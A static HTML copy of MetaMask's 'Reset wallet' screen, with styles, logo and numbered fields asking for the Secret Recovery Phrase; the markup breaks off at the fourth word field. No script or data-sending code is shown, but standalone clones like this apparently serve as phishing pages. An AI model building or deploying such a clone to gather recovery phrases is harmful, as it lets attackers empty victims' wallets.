<html class="metamask-loaded" data-theme="light">
   <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
      <title>MetaMask</title>
      <link rel="stylesheet" type="text/css" href="./index.css" title="ltr">
      <link rel="stylesheet" type="text/css" href="./index-rtl.css" title="rtl" disabled="">
      <link rel="icon" href="./images/logo/metamask-fox.svg" type="image/x-icon"/>
      <style></style>
      <style data-jss="" data-meta="MuiInputBase">
         @-webkit-keyframes mui-auto-fill {}
         @-webkit-keyframes mui-auto-fill-cancel {}
         .MuiInputBase-root {
         color: rgba(0, 0, 0, 0.87);
         cursor: text;
         display: inline-flex;
         position: relative;
         font-size: 1rem;
         box-sizing: border-box;
         align-items: center;
         font-family: "Roboto", "Helvetica", "Arial", sans-serif;
         font-weight: 400;
         line-height: 1.1876em;
         letter-spacing: 0.00938em;
         }
         .MuiInputBase-root.Mui-disabled {
         color: rgba(0, 0, 0, 0.38);
         cursor: default;
         }
         .MuiInputBase-multiline {
         padding: 6px 0 7px;
         }
         .MuiInputBase-multiline.MuiInputBase-marginDense {
         padding-top: 3px;
         }
         .MuiInputBase-fullWidth {
         width: 100%;
         }
         .MuiInputBase-input {
         font: inherit;
         color: currentColor;
         width: 100%;
         border: 0;
         height: 1.1876em;
         margin: 0;
         display: block;
         padding: 6px 0 7px;
         min-width: 0;
         background: none;
         box-sizing: content-box;
         animation-name: mui-auto-fill-cancel;
         letter-spacing: inherit;
         animation-duration: 10ms;
         -webkit-tap-highlight-color: transparent;
         }
         .MuiInputBase-input::-webkit-input-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input::-moz-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input:-ms-input-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input::-ms-input-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input:focus {
         outline: 0;
         }
         .MuiInputBase-input:invalid {
         box-shadow: none;
         }
         .MuiInputBase-input::-webkit-search-decoration {
         -webkit-appearance: none;
         }
         .MuiInputBase-input.Mui-disabled {
         opacity: 1;
         }
         .MuiInputBase-input:-webkit-autofill {
         animation-name: mui-auto-fill;
         animation-duration: 5000s;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
         opacity: 0.42;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
         opacity: 0.42;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
         opacity: 0.42;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
         opacity: 0.42;
         }
         .MuiInputBase-inputMarginDense {
         padding-top: 3px;
         }
         .MuiInputBase-inputMultiline {
         height: auto;
         resize: none;
         padding: 0;
         }
         .MuiInputBase-inputTypeSearch {
         -moz-appearance: textfield;
         -webkit-appearance: textfield;
         }
      </style>
      <style data-jss="" data-meta="MuiInput">
         .MuiInput-root {
         position: relative;
         }
         label + .MuiInput-formControl {
         margin-top: 16px;
         }
         .MuiInput-colorSecondary.MuiInput-underline:after {
         border-bottom-color: #f50057;
         }
         .MuiInput-underline:after {
         left: 0;
         right: 0;
         bottom: 0;
         content: "";
         position: absolute;
         transform: scaleX(0);
         transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
         border-bottom: 2px solid #3f51b5;
         pointer-events: none;
         }
         .MuiInput-underline.Mui-focused:after {
         transform: scaleX(1);
         }
         .MuiInput-underline.Mui-error:after {
         transform: scaleX(1);
         border-bottom-color: #f44336;
         }
         .MuiInput-underline:before {
         left: 0;
         right: 0;
         bottom: 0;
         content: "\00a0";
         position: absolute;
         transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         border-bottom: 1px solid rgba(0, 0, 0, 0.42);
         pointer-events: none;
         }
         .MuiInput-underline:hover:not(.Mui-disabled):before {
         border-bottom: 2px solid rgba(0, 0, 0, 0.87);
         }
         .MuiInput-underline.Mui-disabled:before {
         border-bottom-style: dotted;
         }
         @media (hover: none) {
         .MuiInput-underline:hover:not(.Mui-disabled):before {
         border-bottom: 1px solid rgba(0, 0, 0, 0.42);
         }
         }
      </style>
      <style data-jss="" data-meta="MuiFormLabel">
         .MuiFormLabel-root {
         color: rgba(0, 0, 0, 0.54);
         padding: 0;
         font-size: 1rem;
         font-family: "Roboto", "Helvetica", "Arial", sans-serif;
         font-weight: 400;
         line-height: 1;
         letter-spacing: 0.00938em;
         }
         .MuiFormLabel-root.Mui-focused {
         color: #3f51b5;
         }
         .MuiFormLabel-root.Mui-disabled {
         color: rgba(0, 0, 0, 0.38);
         }
         .MuiFormLabel-root.Mui-error {
         color: #f44336;
         }
         .MuiFormLabel-colorSecondary.Mui-focused {
         color: #f50057;
         }
         .MuiFormLabel-asterisk.Mui-error {
         color: #f44336;
         }
      </style>
      <style data-jss="" data-meta="MuiInputLabel">
         .MuiInputLabel-root {
         display: block;
         transform-origin: top left;
         }
         .MuiInputLabel-formControl {
         top: 0;
         left: 0;
         position: absolute;
         transform: translate(0, 24px) scale(1);
         }
         .MuiInputLabel-marginDense {
         transform: translate(0, 21px) scale(1);
         }
         .MuiInputLabel-shrink {
         transform: translate(0, 1.5px) scale(0.75);
         transform-origin: top left;
         }
         .MuiInputLabel-animated {
         transition: color 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms,transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
         }
         .MuiInputLabel-filled {
         z-index: 1;
         transform: translate(12px, 20px) scale(1);
         pointer-events: none;
         }
         .MuiInputLabel-filled.MuiInputLabel-marginDense {
         transform: translate(12px, 17px) scale(1);
         }
         .MuiInputLabel-filled.MuiInputLabel-shrink {
         transform: translate(12px, 10px) scale(0.75);
         }
         .MuiInputLabel-filled.MuiInputLabel-shrink.MuiInputLabel-marginDense {
         transform: translate(12px, 7px) scale(0.75);
         }
         .MuiInputLabel-outlined {
         z-index: 1;
         transform: translate(14px, 20px) scale(1);
         pointer-events: none;
         }
         .MuiInputLabel-outlined.MuiInputLabel-marginDense {
         transform: translate(14px, 12px) scale(1);
         }
         .MuiInputLabel-outlined.MuiInputLabel-shrink {
         transform: translate(14px, -6px) scale(0.75);
         }
      </style>
      <style data-jss="" data-meta="MuiFormControl">
         .MuiFormControl-root {
         border: 0;
         margin: 0;
         display: inline-flex;
         padding: 0;
         position: relative;
         min-width: 0;
         flex-direction: column;
         vertical-align: top;
         }
         .MuiFormControl-marginNormal {
         margin-top: 16px;
         margin-bottom: 8px;
         }
         .MuiFormControl-marginDense {
         margin-top: 8px;
         margin-bottom: 4px;
         }
         .MuiFormControl-fullWidth {
         width: 100%;
         }
      </style>
      <style data-jss="" data-meta="MuiTextField">
      </style>
      <style data-jss="" data-meta="makeStyles">
         .jss1 {
         color: var(--color-text-alternative);
         font-weight: 400;
         }
         .jss1.jss2 {
         color: var(--color-text-alternative);
         }
         .jss1.jss4 {
         color: var(--color-text-alternative);
         }
         .jss3:before {
         border-bottom: 1px solid var(--color-text-default) !important;
         }
         .jss3:after {
         border-bottom: 2px solid var(--color-primary-default);
         }
         .jss5 {
         color: var(--color-text-alternative);
         }
         .jss6 {
         padding: 8px;
         }
         .jss6::placeholder {
         color: var(--color-text-alternative);
         }
         .jss7 {
         color: var(--color-background-default);
         }
         .jss8:after {
         border-bottom: 2px solid var(--color-background-default);
         }
         .jss9.jss10 {
         color: var(--color-text-alternative);
         }
         .jss9.jss4 {
         color: var(--color-text-alternative);
         }
         .jss12 {
         color: var(--color-text-default);
         border: 1px solid var(--color-border-default);
         height: 48px;
         display: flex;
         padding: 0 16px;
         align-items: center;
         border-radius: 6px;
         background-color: var(--color-background-default);
         }
         label + .jss12 {
         margin-top: 9px;
         }
         .jss12.jss11 {
         border: 1px solid var(--color-primary-default);
         }
         .jss13 {
         color: var(--color-text-default);
         position: initial;
         font-size: 1rem;
         transform: none;
         transition: none;
         }
         .jss14 {
         color: var(--color-text-default);
         position: initial;
         font-size: .75rem;
         transform: none;
         transition: none;
         }
         .jss15 {
         line-height: initial !important;
         }
      </style>
   </head>
   <body>
      <div id="app-content">
         <div class="app os-win">
            <div class="mm-box multichain-app-header multichain-app-header-shadow mm-box--margin-bottom-0 mm-box--display-flex mm-box--align-items-center mm-box--width-full mm-box--background-color-background-default">
               <div class="mm-box multichain-app-header__lock-contents mm-box--padding-2 mm-box--display-flex mm-box--gap-2 mm-box--justify-content-space-between mm-box--align-items-center mm-box--width-full mm-box--background-color-background-default">
                  <div>
                     <button class="mm-box mm-picker-network multichain-app-header__contents__network-picker mm-box--padding-right-4 mm-box--padding-left-2 mm-box--display-flex mm-box--gap-2 mm-box--align-items-center mm-box--background-color-background-alternative mm-box--rounded-pill" data-testid="network-display">
                        <div class="mm-box mm-text mm-avatar-base mm-avatar-base--size-xs mm-avatar-network mm-picker-network__avatar-network mm-text--body-xs mm-text--text-transform-uppercase mm-box--display-flex mm-box--justify-content-center mm-box--align-items-center mm-box--color-text-default mm-box--background-color-background-alternative mm-box--rounded-full mm-box--border-color-transparent box--border-style-solid box--border-width-1"><img class="mm-avatar-network__network-image" src="./images/eth_logo.svg" alt="Ethereum Mainnet logo"></div>
                        <span class="mm-box mm-text mm-text--body-sm mm-text--ellipsis mm-box--color-text-default">Ethereum Mainnet</span><span class="mm-box mm-picker-network__arrow-down-icon mm-icon mm-icon--size-xs mm-box--margin-left-auto mm-box--display-inline-block mm-box--color-icon-default" style="mask-image: url(&quot;./images/icons/arrow-down.svg&quot;);"></span>
                     </button>
                  </div>
                  <button class="mm-box app-header__logo-container app-header__logo-container--clickable mm-box--background-color-transparent" data-testid="app-header-logo">
                     <svg height="30" viewBox="0 0 1311 242" width="162" xmlns="http://www.w3.org/2000/svg" class="app-header__metafox-logo--horizontal">
                        <g fill="none">
                           <g fill="var(--color-text-default)" transform="translate(361 61)">
                              <path d="m796.7 60.9c-6.8-4.5-14.3-7.7-21.4-11.7-4.6-2.6-9.5-4.9-13.5-8.2-6.8-5.6-5.4-16.6 1.7-21.4 10.2-6.8 27.1-3 28.9 10.9 0 .3.3.5.6.5h15.4c.4 0 .7-.3.6-.7-.8-9.6-4.5-17.6-11.3-22.7-6.5-4.9-13.9-7.5-21.8-7.5-40.7 0-44.4 43.1-22.5 56.7 2.5 1.6 24 12.4 31.6 17.1s10 13.3 6.7 20.1c-3 6.2-10.8 10.5-18.6 10-8.5-.5-15.1-5.1-17.4-12.3-.4-1.3-.6-3.8-.6-4.9 0-.3-.3-.6-.6-.6h-16.7c-.3 0-.6.3-.6.6 0 12.1 3 18.8 11.2 24.9 7.7 5.8 16.1 8.2 24.8 8.2 22.8 0 34.6-12.9 37-26.3 2.1-13.1-1.8-24.9-13.5-32.7z"></path>
                              <path d="m71.6 2.3h-7.4-8.1c-.3 0-.5.2-.6.4l-13.7 45.2c-.2.6-1 .6-1.2 0l-13.7-45.2c-.1-.3-.3-.4-.6-.4h-8.1-7.4-10c-.3 0-.6.3-.6.6v115.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-87.7c0-.7 1-.8 1.2-.2l13.8 45.5 1 3.2c.1.3.3.4.6.4h12.8c.3 0 .5-.2.6-.4l1-3.2 13.8-45.5c.2-.7 1.2-.5 1.2.2v87.7c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-115.4c0-.3-.3-.6-.6-.6z"></path>
                              <path d="m541 2.3c-.3 0-.5.2-.6.4l-13.7 45.2c-.2.6-1 .6-1.2 0l-13.7-45.2c-.1-.3-.3-.4-.6-.4h-25.4c-.3 0-.6.3-.6.6v115.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-87.7c0-.7 1-.8 1.2-.2l13.8 45.5 1 3.2c.1.3.3.4.6.4h12.8c.3 0 .5-.2.6-.4l1-3.2 13.8-45.5c.2-.7 1.2-.5 1.2.2v87.7c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-115.4c0-.3-.3-.6-.6-.6z"></path>
                              <path d="m325.6 2.3h-31.1-16.7-31.1c-.3 0-.6.3-.6.6v14.4c0 .3.3.6.6.6h30.5v100.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-100.4h30.5c.3 0 .6-.3.6-.6v-14.4c0-.3-.2-.6-.6-.6z"></path>
                              <path d="m424.1 118.9h15.2c.4 0 .7-.4.6-.8l-31.4-115.8c-.1-.3-.3-.4-.6-.4h-5.8-10.2-5.8c-.3 0-.5.2-.6.4l-31.4 115.8c-.1.4.2.8.6.8h15.2c.3 0 .5-.2.6-.4l9.1-33.7c.1-.3.3-.4.6-.4h33.6c.3 0 .5.2.6.4l9.1 33.7c.1.2.4.4.6.4zm-39.9-51 12.2-45.1c.2-.6 1-.6 1.2 0l12.2 45.1c.1.4-.2.8-.6.8h-24.4c-.4 0-.7-.4-.6-.8z"></path>
                              <path d="m683.3 118.9h15.2c.4 0 .7-.4.6-.8l-31.4-115.8c-.1-.3-.3-.4-.6-.4h-5.8-10.2-5.8c-.3 0-.5.2-.6.4l-31.4 115.8c-.1.4.2.8.6.8h15.2c.3 0 .5-.2.6-.4l9.1-33.7c.1-.3.3-.4.6-.4h33.6c.3 0 .5.2.6.4l9.1 33.7c.1.2.3.4.6.4zm-39.9-51 12.2-45.1c.2-.6 1-.6 1.2 0l12.2 45.1c.1.4-.2.8-.6.8h-24.4c-.4 0-.7-.4-.6-.8z"></path>
                              <path d="m149.8 101.8v-35.8c0-.3.3-.6.6-.6h44.5c.3 0 .6-.3.6-.6v-14.4c0-.3-.3-.6-.6-.6h-44.5c-.3 0-.6-.3-.6-.6v-30.6c0-.3.3-.6.6-.6h50.6c.3 0 .6-.3.6-.6v-14.4c0-.3-.3-.6-.6-.6h-51.2-17.3c-.3 0-.6.3-.6.6v15 31.9 15.6 37 15.8c0 .3.3.6.6.6h17.3 53.3c.3 0 .6-.3.6-.6v-15.2c0-.3-.3-.6-.6-.6h-52.8c-.3-.1-.5-.3-.5-.7z"></path>
                              <path d="m949.3 117.9-57.8-59.7c-.2-.2-.2-.6 0-.8l52-54c.4-.4.1-1-.4-1h-21.3c-.2 0-.3.1-.4.2l-44.1 45.8c-.4.4-1 .1-1-.4v-45c0-.3-.3-.6-.6-.6h-16.7c-.3 0-.6.3-.6.6v115.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-50.8c0-.5.7-.8 1-.4l50 51.6c.1.1.3.2.4.2h21.3c.4-.1.7-.8.3-1.1z"></path>
                           </g>
                           <g stroke-linecap="round" stroke-linejoin="round" transform="translate(1 1)">
                              <path d="m246.1.2-101.1 75 18.8-44.2z" fill="#e17726" stroke="#e17726"></path>
                              <g fill="#e27625" stroke="#e27625" transform="translate(2)">
                                 <path d="m10.9.2 100.2 75.7-17.9-44.9z"></path>
                                 <path d="m207.7 174.1-26.9 41.2 57.6 15.9 16.5-56.2z"></path>
                                 <path d="m.2 175 16.4 56.2 57.5-15.9-26.8-41.2z"></path>
                                 <path d="m71 104.5-16 24.2 57 2.6-1.9-61.5z"></path>
                                 <path d="m184 104.5-39.7-35.4-1.3 62.2 57-2.6z"></path>
                                 <path d="m74.1 215.3 34.5-16.7-29.7-23.2z"></path>
                                 <path d="m146.4 198.6 34.4 16.7-4.7-39.9z"></path>
                              </g>
                              <g fill="#d5bfb2" stroke="#d5bfb2" transform="translate(76 198)">
                                 <path d="m106.8 17.3-34.4-16.7 2.8 22.4-.3 9.5z"></path>
                                 <path d="m.1 17.3 32 15.2-.2-9.5 2.7-22.4z"></path>
                              </g>
                              <path d="m108.7 160.6-28.6-8.4 20.2-9.3z" fill="#233447" stroke="#233447"></path>
                              <path d="m150.3 160.6 8.4-17.7 20.3 9.3z" fill="#233447" stroke="#233447"></path>
                              <g fill="#cc6228" stroke="#cc6228" transform="translate(49 128)">
                                 <path d="m27.1 87.3 5-41.2-31.8.9z"></path>
                                 <path d="m128.9 46.1 4.9 41.2 26.9-40.3z"></path>
                                 <path d="m153 .7-57 2.6 5.3 29.3 8.4-17.7 20.3 9.3z"></path>
                                 <path d="m31.1 24.2 20.2-9.3 8.4 17.7 5.3-29.3-57-2.6z"></path>
                              </g>
                              <g fill="#e27525" stroke="#e27525" transform="translate(57 128)">
                                 <path d="m0 .7 23.9 46.7-.8-23.2z"></path>
                                 <path d="m122 24.2-.9 23.2 23.9-46.7z"></path>
                                 <path d="m57 3.3-5.3 29.3 6.7 34.6 1.5-45.6z"></path>
                                 <path d="m88 3.3-2.8 18.2 1.4 45.7 6.7-34.6z"></path>
                              </g>
                              <path d="m150.3 160.6-6.7 34.6 4.8 3.4 29.7-23.2.9-23.2z" fill="#f5841f" stroke="#f5841f"></path>
                              <path d="m80.1 152.2.8 23.2 29.7 23.2 4.8-3.4-6.7-34.6z" fill="#f5841f" stroke="#f5841f"></path>
                              <path d="m150.9 230.5.3-9.5-2.6-2.2h-38.2l-2.5 2.2.2 9.5-32-15.2 11.2 9.2 22.7 15.7h38.9l22.8-15.7 11.1-9.2z" fill="#c0ac9d" stroke="#c0ac9d"></path>
                              <path d="m148.4 198.6-4.8-3.4h-28.2l-4.8 3.4-2.7 22.4 2.5-2.2h38.2l2.6 2.2z" fill="#161616" stroke="#161616"></path>
                              <g fill="#763e1a" stroke="#763e1a">
                                 <path d="m250.4 80.1 8.5-41.4-12.8-38.5-97.7 72.5 37.6 31.8 53.1 15.5 11.7-13.7-5.1-3.7 8.1-7.4-6.2-4.8 8.1-6.2z"></path>
                                 <path d="m.1 38.7 8.6 41.4-5.5 4.1 8.2 6.2-6.2 4.8 8.1 7.4-5.1 3.7 11.7 13.7 53.1-15.5 37.6-31.8-97.7-72.5z"></path>
                              </g>
                              <g fill="#f5841f" stroke="#f5841f">
                                 <path d="m239.1 120-53.1-15.5 16 24.2-23.9 46.7 31.6-.4h47.2z"></path>
                                 <path d="m73 104.5-53.1 15.5-17.7 55h47.1l31.6.4-23.9-46.7z"></path>
                                 <path d="m145 131.3 3.4-58.6 15.4-41.7h-68.6l15.4 41.7 3.4 58.6 1.3 18.4.1 45.5h28.2l.1-45.5z"></path>
                              </g>
                           </g>
                        </g>
                     </svg>
                     <img src="./images/logo/metamask-fox.svg" class="app-header__metafox-logo--icon" alt="">
                  </button>
               </div>
            </div>
            <div class="mm-box main-container-wrapper">
               <div class="box first-view-main-wrapper box--flex-direction-row">
                  <div class="box first-view-main box--flex-direction-row">
                     <div class="box import-account box--flex-direction-row">
                        <a class="import-account__back-button" href="#">&lt; Back</a>
                        <h1 class="box box--margin-top-1 box--margin-bottom-1 box--flex-direction-row typography typography--h1 typography--weight-normal typography--style-normal typography--color-text-default">Reset wallet</h1>
                        <p class="box box--margin-top-1 box--margin-bottom-1 box--flex-direction-row typography typography--p typography--weight-normal typography--style-normal typography--color-text-default">MetaMask does not keep a copy of your password. If you’re having trouble unlocking your account, you will need to reset your wallet. You can do this by providing the Secret Recovery Phrase you used when you set up your wallet.</p>
                        <p class="box box--margin-top-4 box--margin-bottom-4 box--flex-direction-row typography typography--p typography--weight-normal typography--style-normal typography--color-text-default"><span> This action will delete your current wallet and Secret Recovery Phrase from this device, along with the list of accounts you’ve curated. After resetting with a Secret Recovery Phrase, you’ll see a list of accounts based on the Secret Recovery Phrase you use to reset. This new list will automatically include accounts that have a balance. You’ll also be able to <a class="button btn-link import-account__link" target="_blank" rel="noopener noreferrer" href="https://metamask.zendesk.com/hc/en-us/articles/360015489271">re-add any other accounts</a> created previously. Custom accounts that you’ve imported will need to be <a class="button btn-link import-account__link" target="_blank" rel="noopener noreferrer" href="https://metamask.zendesk.com/hc/en-us/articles/360015489331">re-added</a>, and any custom tokens you’ve added to an account will need to be <a class="button btn-link import-account__link" target="_blank" rel="noopener noreferrer" href="https://metamask.zendesk.com/hc/en-us/articles/360015489031">re-added</a> as well. </span></p>
                        <p class="box box--margin-top-1 box--margin-bottom-4 box--flex-direction-row typography typography--p typography--weight-normal typography--style-normal typography--color-text-default">Make sure you’re using the correct Secret Recovery Phrase before proceeding. You will not be able to undo this.</p>
                        <form class="create-new-vault__form">
                           <div class="import-srp__container">
                              <label class="import-srp__srp-label">
                                 <h4 class="mm-box mm-text mm-text--heading-sm mm-box--color-text-default" align="left">Secret Recovery Phrase</h4>
                              </label>
                              <div class="mm-box mm-banner-base mm-banner-alert mm-banner-alert--severity-info import-srp__paste-tip mm-box--padding-3 mm-box--padding-left-2 mm-box--display-flex mm-box--gap-2 mm-box--background-color-primary-muted mm-box--rounded-sm">
                                 <span class="mm-box mm-icon mm-icon--size-lg mm-box--display-inline-block mm-box--color-primary-default" style="mask-image: url(&quot;./images/icons/info.svg&quot;);"></span>
                                 <div class="mm-box mm-box--min-width-0">
                                    <p class="mm-box mm-text import-srp__banner-alert-text mm-text--body-md mm-box--color-text-default">You can paste your entire secret recovery phrase into any field</p>
                                    <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default"></p>
                                 </div>
                              </div>
                              <div class="dropdown import-srp__number-of-words-dropdown">
                                 <select class="dropdown__select" id="dropdown__select">
                                    <option value="12">I have a 12-word phrase</option>
                                    <option value="15">I have a 15-word phrase</option>
                                    <option value="18">I have a 18-word phrase</option>
                                    <option value="21">I have a 21-word phrase</option>
                                    <option value="24">I have a 24-word phrase</option>
                                 </select>
                                 <span class="mm-box dropdown__icon-caret-down mm-icon mm-icon--size-sm mm-box--display-inline-block mm-box--color-inherit" style="mask-image: url(&quot;./images/icons/arrow-down.svg&quot;);"></span>
                              </div>
                              <div class="import-srp__srp">
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-0" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">1.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl">
                                          <input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-0" type="text" dir="auto" data-testid="import-srp__srp-word-0" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-0-checkbox" type="checkbox" data-testid="import-srp__srp-word-0-checkbox">
                                       <label for="import-srp__srp-word-0-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-1" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">2.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-1" type="text" dir="auto" data-testid="import-srp__srp-word-1" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-1-checkbox" type="checkbox" data-testid="import-srp__srp-word-1-checkbox">
                                       <label for="import-srp__srp-word-1-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-2" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">3.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-2" type="text" dir="auto" data-testid="import-srp__srp-word-2" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-2-checkbox" type="checkbox" data-testid="import-srp__srp-word-2-checkbox">
                                       <label for="import-srp__srp-word-2-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word">
                                    <label for="import-srp__srp-word-3" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">4.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-3" type="text" dir="auto" data-testid="import-srp__srp-word-3" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-3-checkbox" type="checkbox" data-testid="import-srp__srp-word-3-checkbox">
                                       <label for="import-srp__srp-word-3-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
